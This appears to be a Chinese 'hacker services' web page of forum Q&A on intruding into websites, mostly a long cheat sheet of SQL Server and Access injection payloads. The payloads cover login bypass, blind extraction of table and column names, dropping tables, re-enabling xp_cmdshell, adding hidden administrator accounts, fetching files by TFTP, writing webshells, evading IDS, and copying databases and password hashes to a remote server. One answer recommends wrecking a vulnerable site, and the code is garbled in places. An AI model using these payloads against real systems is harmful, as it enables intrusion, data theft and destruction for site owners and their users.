黑客业务

24小时接单的黑客,黑客业务,黑客怎么找,网络黑客,黑客技术

字段查询入侵网站(域名攻击查询方法有)

本文目录一览:

怎么利用这条SQL语句入侵网站

select * from users where userid='; go delete users; go' and truename='; go drop table users; go'

类似上面的,在''之间,填写上如上语句,就会把users表清空和删除。

最近学了啊D明小子的使用,但是很多网站监测不到表段和字段,如果要入侵指定网站该怎么办

没有注入点 或者是废的网站才会没有标段和字段 一般可以先扫扫目录

asp网站access数据库被入侵了,导致标题改人家的关键词,在网站后台无法查到

第一步 先把Access数据库下载下来 看看在哪些表里的哪些字段被替换成了人家的关键词

第二步 写SQL语句 把关键词清理掉

第三步 把Access数据库转成MSSQL数据库

第四步 设置MSSQL服务器权限彻底防注入 并修改网站程序里的数据库连接字符串

第五步 查看网站程序文件 看看哪个文件的修改时间是最晚 那个文件就可能是木马 或者看看那个文件个头很大 那也可能是木马 删掉 并且把该目录的写权限和可执行权限禁掉

第六步 查看网站所有目录 保证出上传目录外 其他目录都没有可写权限 上传目录 的可执行权限禁掉

本人所在公司维护服务器一般都是这几步 你试试

换SQL数据库

ASPX网站入侵的方法

这就要看他网站的安全程度了,

你可以先从登录入口试试sql注入方法,

如果他没有防sql注入式漏洞的 进去彻底破坏下

用户名: 'or'1'='1'or'1'='1

密码: 1'or'1'='1

如果这个方法,不行的话,就要看其它方法,把漏洞,如上传小马等等方法来实现

但如果对方网站安全性太高了的话,要入侵有难度的

怎样黑掉对方网站

入侵网站必备(经典语句)

.判断有无注入点

; and 1=1 and 1=2

2.猜表一般的表的名称无非是admin adminuser user pass

password 等..

and 0(select count(*) from *)

and 0(select

count(*) from admin) ---判断是否存在admin这张表

3.猜帐号数目 如果遇到00)--

and 1=(select

count(*) from admin where len(用户字段名称name)0)

and 1=(select count(*) from

admin where len(_blank密码字段名称password)0)

5.猜解各个字段的长度

猜解长度就是把0变换 直到返回正确页面为止

and 1=(select count(*) from admin where

len(*)0)

and 1=(select count(*) from admin where len(name)6) 错误

and 1=(select count(*) from admin where len(name)5) 正确 长度是6

and

1=(select count(*) from admin where len(name)=6) 正确

and 1=(select

count(*) from admin where len(password)11) 正确

and 1=(select count(*)

from admin where len(password)12) 错误 长度是12

and 1=(select count(*) from

admin where len(password)=12) 正确

6.猜解字符

and 1=(select count(*) from

admin where left(name,1)=a) ---猜解用户帐号的第一位

and 1= (select count(*) from admin

where left(name,2)=ab)---猜解用户帐号的第二位

就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

and 1=(select top 1 count(*) from Admin where Asc(mid (pass,5,1))=51) --

这个查询语句可以猜解中文的用户和_blank密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

group by users.id having 1=1--

group by users.id, users.username,

users.password, users.privs having 1= 1--

; insert into users values( 666,

attacker, foobar, 0xffff )--

UNION SELECT TOP 1 COLUMN_blank_NAME

FROM INFORMATION_blank_SCHEMA.COLUMNS WHERE TABLE_blank

_NAME=logintable-

UNION SELECT TOP 1 COLUMN_blank_NAME FROM

INFORMATION_blank_SCHEMA.COLUMNS WHERE TABLE_blank_NAME=logintable WHERE

COLUMN_blank_NAME NOT IN (login_blank_id)-

UNION SELECT TOP 1

COLUMN_blank_NAME FROM INFORMATION_blank_SCHEMA.COLUMNS WHERE

TABLE_blank_NAME=logintable WHERE COLUMN_blank_NAME NOT IN

(login_blank_id,login_blank_name)-

UNION SELECT TOP 1

login_blank _name FROM logintable-

UNION SELECT TOP 1 password FROM

logintable where login_blank_name=Rahul--

看_blank服务器打的补丁=出错了打了SP4补丁

and 1=(select @@VERSION)--

看_blank数据库连接账号的权限,返回正常,证明是_blank服务器角色sysadmin权限。

and

1=(SELECT IS_blank_SRVROLEMEMBER(sysadmin))--

判断连接_blank数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)

and sa=(SELECT

System_blank_user)--

and user_blank_name()=dbo--

and

0(select user_blank_name()--

看xp_blank_cmdshell是否删除

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name =

xp_blank_cmdshell)--

xp_blank_cmdshell被删除,恢复,支持绝对路径的恢复

;EXEC

master.dbo.sp_blank_addextendedproc xp_blank_cmdshell,xplog70.dll--

;EXEC master.dbo.sp_blank_addextendedproc xp_blank_cmdshell,c:

\inetpub\wwwroot\xplog70.dll--

反向PING自己实验

;use master;declare @s

int;exec sp_blank_oacreate wscript.shell,@s out;exec sp_blank_oamethod

@s,run,NULL,cmd.exe /c ping 192.168.0.1;--

加帐号

;DECLARE @shell

INT EXEC SP_blank_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank

_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$

1866574 /add--

创建一个虚拟目录E盘:

;declare @o int exec

sp_blank_oacreate wscript.shell, @o out exec sp_blank_oamethod @o, run,

NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w 默认Web站点 -v e,e: \--

访问属性:(配合写入一个webshell)

declare @o int exec sp_blank_oacreate

wscript.shell, @o out exec sp_blank_oamethod @o, run, NULL, cscript.exe

c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse

爆库

特殊_blank技巧::%5c=\ 或者把/和\ 修改%5提交

and 0(select top 1 paths from

newtable)--

得到库名(从1到5都是系统的id,6以上才可以判断)

and 1=(select name from

master.dbo.sysdatabases where dbid=7)--

and 0(select count(*) from

master.dbo.sysdatabases where name1 and dbid=6)

依次提交 dbid = 7,8,9....

得到更多的_blank数据库名

and 0(select top 1 name from

bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin

and 0 (select top

1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。

and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and

name=admin

and uid(str (id))) 暴到UID的数值假设为18779569 uid=id

and

0(select top 1 name from bbs.dbo.syscolumns where id=18779569)

得到一个admin的一个字段,假设为 user_blank_id

and 0(select top 1 name from

bbs.dbo.syscolumns where id=18779569 and name not in

(id,...)) 来暴出其他的字段

and 0_id from BBS.dbo.admin where username1)

可以得到用户名

依次可以得到_blank密码。。。。。假设存在user_blank_id username ,password 等字段

and 0(select count(*) from master.dbo.sysdatabases where

name1 and dbid=6)

and 0 (select top 1 name from

bbs.dbo.sysobjects where xtype=U) 得到表名

and 0(select top 1 name from

bbs.dbo.sysobjects where xtype=U and name not in(Address))

and

0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin

and uid(str(id))) 判断id值

and 0(select top 1 name from

BBS.dbo.syscolumns where id=773577794) 所有字段

?id=-1 union select

1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

?id=-1 union select

1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union,access也好用)

得到WEB路径

;create table [dbo].[swap] ([swappass][char](255));--

and (select top 1

swappass from swap)=1--

;CREATE TABLE newtable(id int IDENTITY(1,1),paths

varchar(500)) Declare @test varchar(20) exec master..xp_blank_regread

@rootkey=HKEY_blank_LOCAL_blank_MACHINE, @key=SYSTEM\CurrentControlSet

\Services\W3SVC\Parameters\Virtual Roots\, @value_blank_name=/, values=@test

OUTPUT insert into paths (path) values(@test)--

;use ku1;--

;create

table cmd (str image);-- 建立image类型的表cmd

存在xp_blank_cmdshell的测试过程:

;exec master..xp_blank_cmdshell dir

;exec

master.dbo.sp_blank_addlogin jiaoniang$;-- 加SQL帐号

;exec

master.dbo.sp_blank_password null,jiaoniang$,1866574;--

;exec

master.dbo.sp_blank_addsrvrolemember jiaoniang$ sysadmin;--

;exec

master.dbo.xp_blank_cmdshell net user jiaoniang$ 1866574 /workstations:*

/times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--

;exec

master.dbo.xp_blank_cmdshell net localgroup administrators jiaoniang$

/add;--

exec master..xp_blank _servicecontrol start, schedule

启动_blank服务

exec master..xp_blank_servicecontrol start, server

;

DECLARE @shell INT EXEC SP_blank_OACREATE wscript.shell,@shell OUTPUT EXEC

SP_blank_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user

jiaoniang$ 1866574 /add

;DECLARE @shell INT EXEC SP_blank_OACREATE

wscript.shell,@shell OUTPUT EXEC SP_blank_OAMETHOD @shell,run,null,

C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add

;

exec master..xp_blank_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件

;declare @a sysname set @a=xp_blank_+cmdshell exec @a dir c:\

;declare @a sysname set @a=xp+_blank_cm’+’dshell exec @a dir c:\

;declare @a;set @a=db_blank_name();backup database @a to

disk=你的IP你的共享目录bak.dat

如果被限制则可以。

select * from openrowset

(_blanksqloledb,server;sa;,select OK! exec master.dbo.sp_blank_addlogin

hax)

查询构造:

SELECT * FROM news WHERE id=... AND topic=... AND .....

adminand 1=(select count(*) from [user] where username=victim and

right(left(userpass,01),1)=1) and userpass 

select 123;--

;use

master;--

:a or name like fff%;-- 显示有一个叫ffff的用户哈。

and 1(select

count (email) from [user]);--

;update [users] set email=(select top 1 name

from sysobjects where xtype=u and status0) where name=ffff;--

;update

[users] set email=(select top 1 id from sysobjects where xtype=u and name=ad)

where name=ffff;--

;update [users] set email=(select top 1 name from

sysobjects where xtype=u and id581577110) where name=ffff;--

;update

[users] set email=(select top 1 count(id) from password) where name=ffff;--

;update [users] set email=(select top 1 pwd from password where id=2) where

name=ffff;--

;update [users] set email=(select top 1 name from password

where id=2) where name=ffff;--

上面的语句是得到_blank数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

通过查看ffff的用户资料可得第一个用表叫ad

然后根据表名ad得到这个表的ID 得到第二个表的名字

insert into

users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

char(0x63)+char (0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--

insert

into users values( 667,123,123,0xffff)--

insert into users values ( 123,

admin--, password, 0xffff)--

;and user0

;and (select count(*) from

sysobjects)0

;and (select count(*) from mysysobjects)0

//为access_blank数据库

枚举出数据表名

;update aaa set aaa=(select top 1

name from sysobjects where xtype=u and status0);--

这是将第一个表名更新到aaa的字段处。

读出第一个表,第二个表可以这样读出来(在条件后加上 and name刚才得到的表名)。

;update aaa set

aaa=(select top 1 name from sysobjects where xtype=u and status0 and

namevote);--

然后id=1552 and exists(select * from aaa where aaa5)

读出第二个表,一个个的读出,直到没有为止。

读字段是这样:

;update aaa set aaa=(select top 1

col_blank_name (object_blank_id(表名),1));--

然后id=152 and

exists(select * from aaa where aaa5)出错,得到字段名

;update aaa set aaa=(select

top 1 col_blank_name(object_blank_id(表名),2));--

然后id=152 and

exists(select * from aaa where aaa5)出错,得到字段名

[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]

update 表名 set 字段=(select top 1

name from sysobjects where xtype=u and status0 [ and name你得到的表名

查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and

status0 and name not in(table1,table2,…)

通过SQLSERVER注入_blank漏洞建_blank数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]

update 表名 set 字段= (select

top 1 col_blank_name(object_blank_id(要查询的数据表名),字段列如:1) [ where 条件]

绕过IDS的检测[使用变量]

;declare @a sysname set @a=xp_blank_+cmdshell

exec @a dir c:\

;declare @a sysname set @a=xp+_blank_cm’+’dshell exec @a

dir c:\

1、 开启远程_blank数据库

基本语法

select * from

OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )

参数: (1) OLEDB Provider name

2、 其中连接字符串参数可以是任何端口用来连接,比如

select * from

OPENROWSET(SQLOLEDB, uid=sa;pwd= 123;Network=DBMSSOCN;Address=192.168.0.1,1433;,

select * from table

3.复制目标主机的整个_blank数据库

insert所有远程表到本地表。

基本语法:

insert into OPENROWSET(SQLOLEDB,

server=servername;uid=sa;pwd=123, select * from table1) select * from table2

这行语句将目标主机上table2表中的所有数据复制到远程_blank数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:

insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=

192.168.0.1,1433;,select * from table1) select * from table2

insert into

OPENROWSET(SQLOLEDB,uid=sa;pwd=

123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from

_blank_sysdatabases)

select * from master.dbo.sysdatabases

insert

into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=

192.168.0.1,1433;,select * from _blank_sysobjects)

select * from

user_blank _database.dbo.sysobjects

insert into

OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=

192.168.0.1,1433;,select * from _blank_syscolumns)

select * from

user_blank _database.dbo.syscolumns

复制_blank数据库:

insert into

OPENROWSET(SQLOLEDB,uid=sa;pwd=

123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select *

from database..table1

insert into

OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select

* from table2) select * from database..table2

复制哈西表(HASH)登录_blank密码的hash存储于sysxlogins中。方法如下:

insert into

OPENROWSET (SQLOLEDB,

uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from

_blank_sysxlogins) select * from database.dbo.sysxlogins

得到hash之后,就可以进行暴力破解。

遍历目录的方法: 先创建一个临时表:temp

;create table temp(id

nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_blank_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_blank_subdirs c:\;-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_blank_dirtree c:\;--

获得所有子目录的目录树结构,并寸入temp表中

;insert into temp(id) exec

master.dbo.xp_blank_cmdshell type c:\web\index.asp;-- 查看某个文件的内容

;insert

into temp(id) exec master.dbo.xp_blank_cmdshell dir c:\;--

;insert into

temp(id) exec master.dbo.xp_blank_cmdshell dir c:\ *.asp /s/a;--

;insert

into temp(id) exec master.dbo.xp_blank _cmdshell cscript

C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc

;insert into temp(id,num1)

exec master.dbo.xp_blank_dirtree c:\;-- (xp_blank_dirtree适用权限PUBLIC)

写入表:

语句1:and 1= (SELECT IS_blank_SRVROLEMEMBER(sysadmin));--

语句2:and 1=(SELECT IS_blank_SRVROLEMEMBER (serveradmin));--

语句3:and

1=(SELECT IS_blank_SRVROLEMEMBER(setupadmin));--

语句4:and 1=(SELECT

IS_blank_SRVROLEMEMBER(securityadmin));--

语句5:and 1=(SELECT

IS_blank_SRVROLEMEMBER (securityadmin));--

语句6:and 1=(SELECT

IS_blank_SRVROLEMEMBER(diskadmin));--

语句7:and 1= (SELECT

IS_blank_SRVROLEMEMBER(bulkadmin));--

语句8:and 1=(SELECT

IS_blank_SRVROLEMEMBER (bulkadmin));--

语句9:and 1=(SELECT

IS_blank_MEMBER(db_blank_owner));--

把路径写到表中去:

;create table

dirs(paths varchar(100), id int)--

;insert dirs exec

master.dbo.xp_blank_dirtree c:\--

and 0(select top 1 paths from

dirs)--

and 0 (select top 1 paths from dirs where paths not

in(@Inetpub))--

;create table dirs1(paths varchar(100), id int)--

;insert dirs exec master.dbo.xp_blank_dirtree e:\web--

and

0(select top 1 paths from dirs1)--

把_blank数据库备份到网页目录:下载

;declare @a sysname; set @a=db_blank_name();backup database @a to

disk=e:\web\down.bak;--

and 1=(Select top 1 name from(Select top 12

id,name from sysobjects where xtype=char(85)) T order by id desc)

and

1=(Select Top 1 col_blank_name(object_blank_id(USER_blank_LOGIN),1)

from sysobjects) 参看相关表。

and 1=(select user_blank_id from

USER_blank_LOGIN)

and 0=(select user from USER_blank_LOGIN where

user1)

-=- wscript.shell example -=-

declare @o int

exec

sp_blank_oacreate wscript.shell, @o out

exec sp_blank_oamethod @o,

run, NULL, notepad.exe

; declare @o int exec sp_blank_oacreate

wscript.shell, @o out exec sp_blank_oamethod @o, run, NULL, notepad.exe--

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_blank_oacreate scripting.filesystemobject, @o out

exec

sp_blank_oamethod @o, opentextfile, @f out, c:\boot.ini, 1

exec @ret =

sp_blank_oamethod @f, readline, @line out

while( @ret = 0 )

begin

print @line

exec @ret = sp_blank_oamethod @f, readline, @line out

end

declare @o int, @f int, @t int, @ret int

exec

sp_blank_oacreate scripting.filesystemobject, @o out

exec

sp_blank_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1

exec @ret = sp_blank_oamethod @f, writeline, NULL,

declare @o int, @ret int

exec sp_blank_oacreate

speech.voicetext, @o out

exec sp_blank _oamethod @o, register, NULL,

foo, bar

exec sp_blank_oasetproperty @o, speed, 150

exec

sp_blank_oamethod @o, speak, NULL, all your sequel servers are belong to,us,

528

waitfor delay 00:00:05

; declare @o int, @ret int exec

sp_blank_oacreate speech.voicetext, @o out exec sp_blank_oamethod @o,

register, NULL, foo, bar exec sp_blank_oasetproperty @o, speed, 150 exec

sp_blank_oamethod @o, speak, NULL, all your sequel servers are belong to us,

528 waitfor delay 00:00:05--

xp_blank_dirtree适用权限PUBLIC

exec

master.dbo.xp_blank_dirtree c:\

返回的信息有两个字段

subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。

create table dirs(paths

varchar(100), id int)

建表,这里建的表是和上面xp_blank_dirtree相关连,字段相等、类型相同。

insert dirs exec master.dbo.xp_blank_dirtree c:\

只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,

一步步达到我们想要的信息! 

为什么我在入侵PHP网站的MySQL数据库时,字段数才1就暴错了,什么原因啊......

该网站可能有了一定的入侵检测,例如过滤一定的特殊符号等

或是对非法查询进行处理,例如,不能在特定页面对关键表查询等

  • 评论列表:
  •  双笙袖间
     发布于 2022-06-30 02:04:11  回复该评论
  • 正确 and 1=(select count(*) from admin where len(password)12) 错误 长度是12 and 1=(selec

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.